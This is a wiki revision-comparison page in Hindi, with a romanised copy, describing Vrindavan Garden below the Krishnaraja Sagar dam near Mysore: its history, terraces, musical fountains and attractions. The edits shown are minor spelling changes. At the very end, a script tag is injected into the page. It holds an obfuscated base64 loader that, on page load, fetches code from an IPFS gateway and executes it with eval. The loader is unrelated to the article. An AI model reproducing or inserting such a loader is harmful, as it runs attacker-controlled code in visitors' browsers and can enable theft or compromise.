Difference between revisions of "वृन्दावन गार्डन मैसूर"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - " जरूर " to " ज़रूर ")
m (Text replacement - "हुयी " to "हुई ")
 
(2 intermediate revisions by the same user not shown)
Line 1: Line 1:
 
[[चित्र:Vrindavan-Garden-Mysore.jpg|thumb|250px|वृन्दावन गार्डन, [[मैसूर]]]]
 
[[चित्र:Vrindavan-Garden-Mysore.jpg|thumb|250px|वृन्दावन गार्डन, [[मैसूर]]]]
 
[[चित्र:Administrative-Building-Vrindawan-Gardens-Mysore.jpg|thumb|250px|प्रशासनिक भवन, वृन्दावन गार्डन, [[मैसूर]]]]
 
[[चित्र:Administrative-Building-Vrindawan-Gardens-Mysore.jpg|thumb|250px|प्रशासनिक भवन, वृन्दावन गार्डन, [[मैसूर]]]]
'''वृन्दावन गार्डन''', [[कर्नाटक]] राज्य, [[मैसूर]] शहर से लगभग 19 किलोमीटर की दूरी पर स्थित है। यह ख़ूबसूरत गार्डन [[कावेरी नदी]] पर बने [[कृष्णराज सागर बाँध मैसूर|कृष्णराज सागर बांध]] के नीचे है। इस गार्डन की नींव [[1927]] में रखी गयी थी और इसका निर्माण कार्य [[1932]] में पूरा हुआ था। यह गार्डन 20 एकड़ के क्षेत्र में फैला हुआ है। इस गार्डन की सजावट नृत्य करते फव्‍वारों और फूलों से हुयी है। इस गार्डन में फ़िल्‍मों की शूटिंग अक्‍सर होती रहती है।<ref>{{cite web |url=http://khulasaa.com/index.php?option=com_content&view=article&id=146&Itemid=49 |title=वृन्दावन गार्डन |accessmonthday=[[26 अप्रॅल]] |accessyear=[[2011]] |last= |first= |authorlink= |format= |publisher=खुलासा डॉट कॉम |language=[[हिन्दी]] }}</ref> मैसूर शहर में आने वाला प्रत्येक यात्री प्रसिद्ध वृन्दावन गार्डन देखना एक आवश्यक कार्य मानता था। इस गार्डन में फव्वारों का जल प्रपात, मर्मर पक्षी और आकर्षक [[भारत के पुष्प|फूलों]] की बहुतायत देखते ही बनती थी।
+
'''वृन्दावन गार्डन''', [[कर्नाटक]] राज्य, [[मैसूर]] शहर से लगभग 19 किलोमीटर की दूरी पर स्थित है। यह ख़ूबसूरत गार्डन [[कावेरी नदी]] पर बने [[कृष्णराज सागर बाँध मैसूर|कृष्णराज सागर बांध]] के नीचे है। इस गार्डन की नींव [[1927]] में रखी गयी थी और इसका निर्माण कार्य [[1932]] में पूरा हुआ था। यह गार्डन 20 एकड़ के क्षेत्र में फैला हुआ है। इस गार्डन की सजावट नृत्य करते फव्‍वारों और फूलों से हुई है। इस गार्डन में फ़िल्‍मों की शूटिंग अक्‍सर होती रहती है।<ref>{{cite web |url=http://khulasaa.com/index.php?option=com_content&view=article&id=146&Itemid=49 |title=वृन्दावन गार्डन |accessmonthday=[[26 अप्रॅल]] |accessyear=[[2011]] |last= |first= |authorlink= |format= |publisher=खुलासा डॉट कॉम |language=[[हिन्दी]] }}</ref> मैसूर शहर में आने वाला प्रत्येक यात्री प्रसिद्ध वृन्दावन गार्डन देखना एक आवश्यक कार्य मानता था। इस गार्डन में फव्वारों का जल प्रपात, मर्मर पक्षी और आकर्षक [[भारत के पुष्प|फूलों]] की बहुतायत देखते ही बनती थी।
 
==परिचय==
 
==परिचय==
वृंदावन गार्डन तीन छतों में बना है जिसमें पानी के फव्वारे, पेड़, बेलबूटे और फूलों के पौधे शामिल हैं। इस गार्डन का विशेष आकर्षण 'म्यूजिकल फाउन्टेन्स' में [[संगीत]] की लहरी पर झूमते-नाचते पानी के फव्वारों का एक छोटा-सा शो है। इस विशाल गार्डन में नौका विहार का आनंद भी उठाया जा सकता है। मैसूर में पर्यटकों को वृंदावन गार्डन देखने ज़रूर जाना चाहिए।<ref>{{cite web |url=http://www.jagranyatra.com/2010/03/heritage-sites-karnataka/ |title=वृन्दावन गार्डन |accessmonthday=[[26 अप्रॅल]] |accessyear=[[2011]] |last= |first= |authorlink= |format= |publisher=जागरण यात्रा |language=[[हिन्दी]] }}</ref>शाम होने के बाद वृंदावन गार्डन में लयबद्ध तरीके से जलती-बुझती रोशनी और [[संगीत]] पर पानी के फव्वारों का नृत्य देखने के लिए भीड़ जुटती है। जिस प्रकार शाम रात की ओर बढ़ने लगती है, वाद्य यंत्रों की धुन पर पानी के रंग-बिरंगे फव्वारे जीवंत हो जाते हैं। यह नजारा इतना अद्भुत होता है कि मानो पर्यटक परियों के देश में पहुँच गए हों। हर साल लगभग 20-22 लाख पर्यटक इसको देखने आते हैं। यह उद्यान सामान्य जनता के लिये निःशुल्क खुला रहता है।
+
वृंदावन गार्डन तीन छतों में बना है जिसमें पानी के फ़व्वारे, पेड़, बेलबूटे और फूलों के पौधे शामिल हैं। इस गार्डन का विशेष आकर्षण 'म्यूजिकल फाउन्टेन्स' में [[संगीत]] की लहरी पर झूमते-नाचते पानी के फव्वारों का एक छोटा-सा शो है। इस विशाल गार्डन में नौका विहार का आनंद भी उठाया जा सकता है। मैसूर में पर्यटकों को वृंदावन गार्डन देखने ज़रूर जाना चाहिए।<ref>{{cite web |url=http://www.jagranyatra.com/2010/03/heritage-sites-karnataka/ |title=वृन्दावन गार्डन |accessmonthday=[[26 अप्रॅल]] |accessyear=[[2011]] |last= |first= |authorlink= |format= |publisher=जागरण यात्रा |language=[[हिन्दी]] }}</ref>शाम होने के बाद वृंदावन गार्डन में लयबद्ध तरीके से जलती-बुझती रोशनी और [[संगीत]] पर पानी के फव्वारों का नृत्य देखने के लिए भीड़ जुटती है। जिस प्रकार शाम रात की ओर बढ़ने लगती है, वाद्य यंत्रों की धुन पर पानी के रंग-बिरंगे फ़व्वारे जीवंत हो जाते हैं। यह नज़ारा इतना अद्भुत होता है कि मानो पर्यटक परियों के देश में पहुँच गए हों। हर साल लगभग 20-22 लाख पर्यटक इसको देखने आते हैं। यह उद्यान सामान्य जनता के लिये निःशुल्क खुला रहता है।
 
==प्रमुख आकर्षण==
 
==प्रमुख आकर्षण==
 
*उद्यान में कर्तनकला (यहाँ झाड़ियों को जानवरों के आकार में काटकर बनाया गया है)  
 
*उद्यान में कर्तनकला (यहाँ झाड़ियों को जानवरों के आकार में काटकर बनाया गया है)  
 
*लतामंडप (विसर्पि पौधों की लताओं से ढका रास्ता)
 
*लतामंडप (विसर्पि पौधों की लताओं से ढका रास्ता)
 
*धारागृह  
 
*धारागृह  
*संगीतमय फव्वारे
+
*संगीतमय फ़व्वारे
 
*झील
 
*झील
  

Latest revision as of 07:40, 7 November 2017

[[chitr:Vrindavan-Garden-Mysore.jpg|thumb|250px|vrindavan gardan, maisoor]] [[chitr:Administrative-Building-Vrindawan-Gardens-Mysore.jpg|thumb|250px|prashasanik bhavan, vrindavan gardan, maisoor]] vrindavan gardan, karnatak rajy, maisoor shahar se lagabhag 19 kilomitar ki doori par sthit hai. yah khoobasoorat gardan kaveri nadi par bane krishnaraj sagar baandh ke niche hai. is gardan ki nianv 1927 mean rakhi gayi thi aur isaka nirman kary 1932 mean poora hua tha. yah gardan 20 ek d ke kshetr mean phaila hua hai. is gardan ki sajavat nrity karate phavh‍varoan aur phooloan se huee hai. is gardan mean filh‍moan ki shootiang akh‍sar hoti rahati hai.[1] maisoor shahar mean ane vala pratyek yatri prasiddh vrindavan gardan dekhana ek avashyak kary manata tha. is gardan mean phavvaroan ka jal prapat, marmar pakshi aur akarshak phooloan ki bahutayat dekhate hi banati thi.

parichay

vriandavan gardan tin chhatoan mean bana hai jisamean pani ke favvare, pe d, belaboote aur phooloan ke paudhe shamil haian. is gardan ka vishesh akarshan 'myoojikal phauntens' mean sangit ki lahari par jhoomate-nachate pani ke phavvaroan ka ek chhota-sa sho hai. is vishal gardan mean nauka vihar ka anand bhi uthaya ja sakata hai. maisoor mean paryatakoan ko vriandavan gardan dekhane zaroor jana chahie.[2]sham hone ke bad vriandavan gardan mean layabaddh tarike se jalati-bujhati roshani aur sangit par pani ke phavvaroan ka nrity dekhane ke lie bhi d jutati hai. jis prakar sham rat ki or badhane lagati hai, vady yantroan ki dhun par pani ke rang-birange favvare jivant ho jate haian. yah nazara itana adbhut hota hai ki mano paryatak pariyoan ke desh mean pahuanch ge hoan. har sal lagabhag 20-22 lakh paryatak isako dekhane ate haian. yah udyan samany janata ke liye niahshulk khula rahata hai.

pramukh akarshan

  • udyan mean kartanakala (yahaan jha diyoan ko janavaroan ke akar mean katakar banaya gaya hai)
  • latamandap (visarpi paudhoan ki lataoan se dhaka rasta)
  • dharagrih
  • sangitamay favvare
  • jhil


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

  1. vrindavan gardan (hindi) khulasa d aaut k aaum. abhigaman tithi: 26 aprॅl, 2011.
  2. vrindavan gardan (hindi) jagaran yatra. abhigaman tithi: 26 aprॅl, 2011.

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>